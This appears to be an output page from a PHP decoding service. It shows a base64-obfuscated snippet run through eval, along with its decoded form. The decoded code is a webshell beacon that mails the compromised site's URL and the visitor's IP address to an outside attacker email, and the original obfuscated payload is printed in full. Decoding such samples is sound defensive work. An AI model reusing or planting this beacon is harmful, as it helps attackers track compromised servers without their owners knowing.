Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$port_bind_d = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogIC..
Decoded Output download
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
$visitc = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
$judul = "WebShell http://$target by $visitor";
$body = "Bug: $target by $visitor<br>";
if (!empty($web)) { @mail("[email protected]",$judul,$body); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);Did this file decode correctly?
Original Code
$port_bind_d = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldlYlNoZWxsIGh0dHA6Ly8kdGFyZ2V0IGJ5ICR2aXNpdG9yIjsNCiAgJGJvZHkgICAgPSAiQnVnOiAkdGFyZ2V0IGJ5ICR2aXNpdG9yPGJyPiI7DQogIGlmICghZW1wdHkoJHdlYikpIHsgQG1haWwoImYzZDBzM3J2M3JAaG90bWFpbC5jb20iLCRqdWR1bCwkYm9keSk7IH0NCn0NCmVsc2UgeyAkdmlzaXRjKys7IH0NCkBzZXRjb29raWUoInZpc2l0eiIsJHZpc2l0Yyk7"; eval(base64_decode($port_bind_d));Function Calls
| base64_decode | 1 |
Stats
| MD5 | 5b7e9815c94ecc27ba6df1e0a0f0f0f1 |
| Eval Count | 1 |
| Decode Time | 49 ms |